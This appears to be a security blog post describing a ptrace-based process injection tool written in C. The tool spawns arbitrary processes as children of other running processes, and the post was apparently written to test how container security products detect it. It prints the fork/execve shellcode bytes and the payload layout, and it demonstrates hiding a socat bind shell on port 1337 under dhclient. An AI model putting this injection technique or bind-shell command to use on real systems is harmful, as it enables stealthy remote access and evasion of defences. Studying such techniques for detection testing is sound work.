I was testing some of the endpoint protection capabilities of a couple of COTS container security products and wanted to see how well the detection of unusual interprocess memory interactions and process injection attack behaviors on Linux containers worked. I decided to write a pair of short and simple programs, one without PIE enabled that just sleeps and prints a number every 20 seconds, and another that ptrace attaches to a target pid and sets a word of data at a fixed address before detaching. In this case, if the second program made this change in memory to a process instance of the first, it would change the executable code that moves the number to the register to be printed so that it would print a different number. This triggered no specific detections, which seemed somewhat reasonable, as such a minor ptrace interaction would probably be indistinguishable from intended debugger interactions.
I reflected for a bit on what blatantly malicious ptrace usage would look like. An argument could be made that any ptrace calls occurring in a production privileged Linux container is likely malicious, as there shouldn't be any use case for it, especially not debugging. After thinking about what was theoretically possible based on my relatively intermediate understanding of Linux process internals, I settled on wanting to write a tool for spawning arbitrary new processes as children of arbitrary other processes. I would implement this with ptrace by overwriting and then reverting some shellcode and registers.
It is worth noting that this post uses a lot of terms and concepts without explaining them, and expects a basic understanding of Linux process internals and terms surrounding them.
To do this in practice, my plan was to build a tool that writes custom shellcode at the target process instruction pointer when ptrace attaches that would include arguments for execve and the actual shellcode to make fork and execve syscalls. After execution was resumed and the fork and execve occurred, the shellcode would then raise a signal from the target process, prompting for the tool to write back the original memory and registers to the target process and ptrace detach.
To do this, the following steps would occur.
In actually implementing this, there were some steps that in practice had additional details. I wrote this tool in C, and am calling it the burster shell, as the concept of spawning a child from an unaware process can be likened to alien chestbursters. The source code can be viewed here.
Initially during development, instead of having shellcode that forked and then executed, I instead had shellcode that just executed, replacing the target process image entirely, not requiring any cleanup. This seems like a useful functionality, but not the intended goal of this tool, and something that I may want to come back to.
Referencing the source, in the final implementation, the shellcode looks like the following.
// syscall| cmp rax 0 |jne +9 |mov rax 0x3b |syscall|int|
const char shellcode[] = "\x0f\x05\x48\x83\xf8\x00\x75\x09\x48\xc7\xc0\x3b\x00\x00\x00\x0f\x05\xcc";
Assembled, the shellcode looks like this.
This shellcode makes a lot of assumption about the state of registers before it is run. It makes a syscall, assuming that the registers are already set up for making a fork syscall, then compares the returned pid in rax, jumping to the instruction to raise a SIGTRAP in the case of the parent. In the case of the child, this jump doesn't occur, and rax is set to the syscall number of execve. Another syscall instruction is run, assuming rdi contains the pointer to the future child *argv[] written in the payload to the process memory before the shellcode, and rsi contains the pointer to the start of the filename in the payload. It is also assumed that rdx (*envp[]) is set to 0. This leads to the child process making a successful execve call and replacing its image entirely, ending its execution of the shellcode.
The full payload with the char* strings of argv, and the char** pointers to the strings of argv looks like the following.
//[filename][argv0][argv1][&argv0][&argv1][null ptr to terminate argv][nop buffer][shellcode]
In a case where /usr/bin/sleep 20
is intended to be executed as a child of a target process, the payload may look like the following.
In this example, argc is 2, but this is supported for an arbitrary argc. The filename is a null terminated string used for the execve syscall. The argv0 and argv1 values are also null terminated strings that include the content of the arguments of the child process to create. &argv0 and &argv1 point to the instruction pointer this payload is written to plus the distance from the start of the payload that argv0 and argv1 sit at respectively. A null ptr comes after these to terminate *argv[]. 8 nops are included after the "data" section of the payload to prevent any of the data from globbing with the instructions and resulting in invalid, or unintended instructions being formed with the executable shellcode due to arbitrary x86_64 instruction length. The shellcode is then written, and its start is the address that the target process instruction pointer will be set to before continuing the target process.
The interface for this tool is flavored as a shell. By default, it will target its own child process that it creates at launch, but the target process can be changed with a setpid [pid]
shell builtin command. Instead of spawning children of its own like a traditional shell, it will instead ptrace attach to the target process and use the previously described mechanisms to spawn children on the target process.
For this example demonstration, the goal will be to spawn a socat bind shell as a child of the already running dhclient process. First, we will run pstree
to get the currently running process hierarchy tree, and then run pidof
to get the pid of our target process.
We can see that the dhclient process has two children, another dhclient process, and sleep. We can also see that the pid of the dhclient process we want to target is 399. We can now run the burster shell and use the shell builtin to set the target pid to 399. Now, any commands executed will be spawned as children of the target process, dhclient, via the previously described mechanisms. We now can run /usr/bin/socat -d -d TCP4-LISTEN:1337 EXEC:/bin/bash
to start a socat bind shell as a child of the dhclient process.
We see that it appears to have executed successfully, and we can exit the burster shell. We can now attempt to connect to the bind shell and execute commands. We see that we can do this successfully, and running pstree, we see that the dhclient process now has a child process of socat, which in turn has its own bash child process that is our active bind shell.
Our bind shell will continue to run as a child of dhclient until the parent dies, it is killed, or the system is rebooted. We have successfully spawned a child process of an arbitrary process.
This implementation is very naive and has a lot of flaws. Here are some of the ones that have been identified.
When children of the target processes exit, they are not cleaned up by the parent, which leads to all children being leaked as zombie processes. This is unfortunate, and without injecting long term code into the target process, I am unaware of a way to handle this.
This is why there is a sleep
child of the dhclient process in the demonstration section. It was a zombie created by a previous test, and I have no way to clean it up.
The execve syscall is deliberately made with a null *envp[] pointer. It is difficult to say what *envp[] should even be. Should a copy of the burster shell's *envp[] be copied into the payload, like the target *argv[] is? Should some introspection of stack frames be done by the burster shell to find the target process's *envp[] address and use that? In either case, additional code would have to be written, and new problems would crop up in the details.
As a C program, this shell sucks. There are blind memcpy(3) calls that can easily overflow the fixed length buffers on the stack. The arrays that some of the target process data gets read into are also fixed length. One can observe here bad practices and bad code, but ultimately this is meant to be a fast and useful proof of concept tool.
As a shell, this shell sucks. I'd like readline or similar support, some ways to control certain *envp[] values passed to children, more shell builtins, piping (this could be a nightmare), a way to escape spaces and wrap things in quotes, and just generally more niceties expected of a usable shell.
This code is aggressively non portable. The shellcode assumes x86_64. The syscall ABI assumes Linux calling conventions. A long is assumed to be the same size of a pointer, which is assumed to be 8 bytes.
The burster shell process assumes that there is enough executable memory after the instruction pointer at the time of attaching to a target process to hold the entire payload. If a fixed payload size was set to be less than 4096 bytes, the typical page size on a Linux system, and instead of writing at the instruction pointer, the payload was written at the start of the current page calculated based on page address alignment rules, this could be done safely.
In the case where this assumption fails, the target process will segfault when running the shellcode. In practice, I have yet to see this occur.
This project started as an unnecessarily deep dive into evaluating COTS container security runtime products, and lead me to a better understanding of Linux processes and ptrace, as well as a usable proof of concept process injecting shell. I am avoiding including any details, drawing any conclusions, or dropping any vendor names here around how the container security capabilities detected the process injection behaviors of this tool on Linux containers with the ptrace capability. In short, I was not impressed.
In the future, I may use this tool for interesting post exploitation trickery, and generally break it out as a cool party trick in occasions that call for it. I was able to confirm a lot of my understanding of Linux process internals by actually implementing my idea, and am surprised that it ended up working the way I thought it would.